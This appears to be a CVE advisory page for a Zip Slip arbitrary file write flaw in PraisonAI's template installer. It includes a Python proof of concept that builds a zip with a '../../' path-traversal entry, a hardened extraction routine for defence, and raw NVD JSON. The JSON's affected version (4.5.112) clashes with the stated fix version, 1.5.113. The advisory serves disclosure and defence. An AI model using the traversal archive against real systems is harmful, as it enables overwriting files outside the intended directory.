Security Vulnerability Report
CVE-2026-39307 CVSS 8.1 HIGH

CVE-2026-39307

Published: 2026-04-07 17:16:37
Last Modified: 2026-04-16 01:18:47

Description

PraisonAI is a multi-agent teams system. Prior to 1.5.113, the PraisonAI templates installation feature is vulnerable to a "Zip Slip" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's zipfile.extractall() without verifying whether the files within the archive resolve outside of the intended extraction directory. This vulnerability is fixed in 1.5.113.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAI < 1.5.113

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import zipfile

# PoC to generate a malicious zip file for the Zip Slip vulnerability.
# This script creates a zip file containing an entry whose name carries a
# path traversal sequence.


def create_malicious_zip(filename):
    with zipfile.ZipFile(filename, 'w') as z:
        # The entry name includes "../" to escape the extraction directory
        z.writestr("../../malicious_payload.txt",
                   "This is a malicious file written via Zip Slip.")
    print(f"Created malicious zip file: {filename}")


if __name__ == "__main__":
    create_malicious_zip("exploit_template.zip")
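The defensive counterpart to the description and the PoC above: an extraction routine that validates every archive member against the destination directory before anything is written, so an entry like the one the PoC creates is rejected instead of landing outside the tree. This is an added example, not PraisonAI's code and not the fix shipped in 1.5.113; the function names, the in-memory sample archives and the `templates` destination directory are constructed for the demonstration.

```python
from __future__ import annotations

import io
import stat
import tempfile
import zipfile
from pathlib import Path


class UnsafeArchiveError(Exception):
    """Raised when an archive member would land outside the destination directory."""


def validate_members(zf: zipfile.ZipFile, dest: Path) -> list[zipfile.ZipInfo]:
    """Return all members of `zf`, raising UnsafeArchiveError on the first unsafe one.

    Each member name is joined to `dest` and resolved; '..' components and
    absolute names collapse to a path that is no longer relative to `dest`.
    Symlink members are rejected as well, since a link pointing outside the
    tree would let a later member be written through it.
    """
    dest = dest.resolve()
    checked = []
    for info in zf.infolist():
        target = (dest / info.filename).resolve()
        try:
            target.relative_to(dest)
        except ValueError:
            raise UnsafeArchiveError(
                f"member {info.filename!r} resolves to {target} outside {dest}"
            ) from None
        # Unix mode bits live in the high 16 bits of external_attr
        if stat.S_ISLNK(info.external_attr >> 16):
            raise UnsafeArchiveError(f"member {info.filename!r} is a symlink")
        checked.append(info)
    return checked


def archive_is_safe(archive_bytes: bytes, dest: str | Path) -> bool:
    """True if every member would stay inside `dest`; extracts nothing."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        try:
            validate_members(zf, Path(dest))
        except UnsafeArchiveError:
            return False
    return True


def safe_extractall(archive_bytes: bytes, dest: Path) -> list[str]:
    """Validate the whole member list first, then extract; nothing is written on failure."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        members = validate_members(zf, dest)
        zf.extractall(dest, members=members)
        return [m.filename for m in members]


def build_zip(entries: dict[str, str]) -> bytes:
    """Build an in-memory zip from {name: content}; used for the constructed sample archives."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def demo() -> dict[str, bool]:
    """Run the hardened extractor against a benign archive and a traversal archive."""
    benign = build_zip({"template/agents.yaml": "agents: []\n"})
    traversal = build_zip({"../../escaped.txt": "must never be written\n"})
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        dest = Path(tmp) / "templates"
        dest.mkdir()
        results["benign_extracted"] = (
            safe_extractall(benign, dest) == ["template/agents.yaml"]
            and (dest / "template" / "agents.yaml").is_file()
        )
        try:
            safe_extractall(traversal, dest)
            results["traversal_rejected"] = False
        except UnsafeArchiveError:
            results["traversal_rejected"] = True
        # Where the traversal entry would have landed had it been extracted
        escape_target = (dest / "../../escaped.txt").resolve()
        results["no_escape_on_disk"] = not escape_target.exists()
    return results


if __name__ == "__main__":
    print(demo())
```

Validating the complete member list before the single `extractall` call means a rejected archive causes no partial write, and resolving the joined path rather than string-matching on `..` also catches absolute names and mixed separators. The check is performed by the caller and does not depend on whatever sanitisation the archive library itself applies.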

References

https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4ph2-f6pf-79wv (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-39307",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T17:16:36.613",
    "lastModified": "2026-04-16T01:18:47.283",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "PraisonAI is a multi-agent teams system. Prior to 1.5.113, The PraisonAI templates installation feature is vulnerable to a \"Zip Slip\" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's zipfile.extractall() without verifying if the files within the archive resolve outside of the intended extraction directory. This vulnerability is fixed in 1.5.113."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "4.5.112",
                "matchCriteriaId": "93136744-3972-4DDD-B569-091065F57C0B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4ph2-f6pf-79wv",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Vendor Advisory"
        ]
      }
    ]
  }
}